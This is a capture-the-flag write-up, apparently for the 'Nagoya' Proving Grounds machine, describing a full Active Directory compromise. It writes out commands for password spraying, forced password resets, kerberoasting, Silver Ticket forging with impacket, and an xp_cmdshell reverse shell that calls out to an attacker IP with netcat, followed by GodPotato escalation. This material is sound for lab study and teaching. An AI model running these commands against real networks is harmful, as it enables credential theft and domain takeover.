Enumeration

Nmap

Initial nmap scan revealed common DC ports.

00nmap

I added necessary domains to /etc/hosts file.

01 0 etc hosts

Web Enumeration

Website included many names.

01web

Exploitation

User Enumeration

So using username-anarchy, I created a userList.

02userList

Then using kerbrute, I applied user enumeration and noted valid usernames.

03validusers

Password Spraying

Later, I tried many techniques and non of them worked. Then I found that the website was created in 2023.

04nagoya

So using cewl I created wordlist then appended 2023 and 2023! at the end of each record using below command.

for i in $(cat password); do echo $i; echo ${i}2022; echo ${i}2023; echo ${i}\! ;done > pass.txt

Then I applied brute force using kerbrute and found valid credentials.

05found

BloodHound

Then I executed bloodhound-python.

bloodhound-python -u 'andrea.hayes' -p 'Nagoya2023' -c all -ns 192.168.224.21 -d nagoya-industries.com --zip

06bloodhound

And it revealed a path where I can apply force change password twice to get winRM shell.

07longway

I used below command to change user’s password.

net rpc password "CHRISTOPHER.LEWIS" "Test1234." -U "nagoya-industries.com"/"iain.white"%"Test1234." -S "192.168.224.21"

08gg

Then I obtained user flag and winrm shell.

09localflag

Privilege Escalation

Kerberoasting

Later I applied kerberoasting using impacket-GetUserSPNs.

impacket-GetUserSPNs nagoya-industries.com/'CHRISTOPHER.LEWIS':'Test1234.' -request

10sus

And I was able to crack svc_mssql password.

11cracked

MSSQL Service

At first I tried many methods but could not find anything useful. Then I found MSSQL service is up but unreachable from outside.

12suspicious

So I tried to exploit it locally with PowerUpSQL but I could not.

Later I set up ligolo-ng as shown below to reach local MSSQL service.

  1. I set up an proxy

15proxy

  1. I executed the agent.exe

14agent

With that setup, I was able to login to mssql. But to login I change /etc/hosts to 240.0.0.1.

16mssql login

Silver Ticket

However, I had no permission, there were no links or no impersonation. So, as I am the service account I could exploit Silver Ticket to login MSSQL as administrator.

  1. Generate NTLM hash for service account

17 0 ntlm

  1. Create an administrator ticket using impacket-ticketer
impacket-ticketer -nthash "E3A0168BC21CFB88B95C954A5B18F57C" -domain-sid "S-1-5-21-1969309164-1513403977-1686805993" -spn "MSSQL/nagoya.nagoya-industries.com"  -domain "nagoya-industries.com" -user-id 500 "Administrator"

17silver ticket

  1. Using KRB55CCNAME inject this ticket to obtain administrator MSSQL login.
KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k nagoya.nagoya-industries.com

18zort

xp_cmdshell

Later, I simply executed xp_cmdshell to obtain reverse shell.

EXEC xp_cmdshell 'cmd /c C:\temp\nc64.exe 192.168.45.216 445 -e cmd.exe'

And I obtained the shell.

19revshell

SeImpersonatePrivilege (GodPatato)

Then I downloaded GodPatato (BeichenDream/GodPotato) and executed it to obtain SYSTEM reverse shell.

20godpatato

I simply read Administrator flag.

21gg

<
Previous Post
Mice - Proving Grounds Practice
>
Next Post
perfect-survey 1.5.1 exploit (CVE-2021-24762)